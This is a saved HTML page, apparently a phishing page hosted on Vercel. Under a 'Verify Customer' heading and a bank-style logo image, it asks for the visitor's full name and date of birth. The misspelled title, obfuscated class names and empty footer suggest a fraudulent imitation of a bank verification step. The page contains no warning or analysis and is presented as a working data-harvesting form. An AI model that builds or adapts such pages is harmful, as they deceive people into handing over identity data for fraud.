<!DOCTYPE html>
<!-- saved from url=(0030)https://sb-bysf.vercel.app/why -->
<html lang="en" webcrx="" style="">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="viewport" content="width=device-width">
    <title>Wellcometo</title>
    <meta name="next-head-count" content="3">
    <link rel="stylesheet" href="./css/style.css" />

</head>

<body cz-shortcut-listen="true">
    <div id="__next">
        <header class="Jeuookhh_logo__chFnY"><img alt="gW2dWg" loading="lazy" width="120" height="32" decoding="async"
                data-nimg="1" src="./images/yono.png" style="color: transparent;"></header>
        <main>
            <div class="Jeuookhh_login_heading__g_rIN">
                <h3 class="Jeuookhh_login_heading_h3__40cUi">Verify Customer</h3>
            </div>
            <div class="Jeuookhh_login_form__UT1PX">
                <p class="Jeuookhh_mandatory_txt__seeNN">Mandatory fields are indicated with an asterisk ().</p>
                <form class="Jeuookhh_form__NPDIu" method="post"><input type="hidden" name="formtoken" value="VEtOxk">
                    <div class="Jeuookhh_form_group__iOuIR"><label class="Jeuookhh_label__fvDl5">Your Full Name <span
                                class="Jeuookhh_mandatory_txt__seeNN">*</span></label><input name="cFname" type="text"
                            class="Jeuookhh_form_control__aKuXl" required="" maxlength="30"></div>
                    <div class="Jeuookhh_form_group__iOuIR"><label class="Jeuookhh_label__fvDl5">Date of Birth <span
                                class="Jeuookhh_mandatory_txt__seeNN">*</span></label><input name="Birtd" type="text"
                            class="Jeuookhh_form_control__aKuXl" required="" placeholder="dd/mm/yyyy" minlength="10"
                            maxlength="10"></div>
                    <div class="Jeuookhh_t_center____ZxZ"><input type="submit" class="Jeuookhh_btn_default__PIkhU"
                            value="submit"></div>
                </form><br>
            </div>
        </main>
        <div class="Jeuookhh_footer_area__5ot65"><img alt="brwi10" loading="lazy" width="68" height="28"
                decoding="async" data-nimg="1" src="./images/gwhp.png" style="color: transparent;"></div>
        <div class="Jeuookhh_footer__Wxn0J">
            <p>©</p>
        </div>
    </div>
    <script id="__NEXT_DATA__" type="application/json"
        crossorigin="">{"props":{"pageProps":{}},"page":"/","query":{},"buildId":"0lCBycRkeqCWXcllfoPaw","nextExport":true,"autoExport":true,"isFallback":false,"scriptLoader":[]}</script>
    <next-route-announcer>
        <p aria-live="assertive" id="__next-route-announcer__" role="alert"
            style="border: 0px; clip: rect(0px, 0px, 0px, 0px); height: 1px; margin: -1px; overflow: hidden; padding: 0px; position: absolute; top: 0px; width: 1px; white-space: nowrap; overflow-wrap: normal;">
            Loading...</p>
    </next-route-announcer>
    <script src="./Wellcometo3_files/354-4e020a05081b574c.js.download"></script>
    <script src="./Wellcometo3_files/bbx-87a45827a86431f3.js.download"></script>
    <script src="./Wellcometo3_files/kj-2223d62af91e386b.js.download"></script>
    <script src="./Wellcometo3_files/why-373c9d3dc95162c6.js.download"></script>
</body>

</html>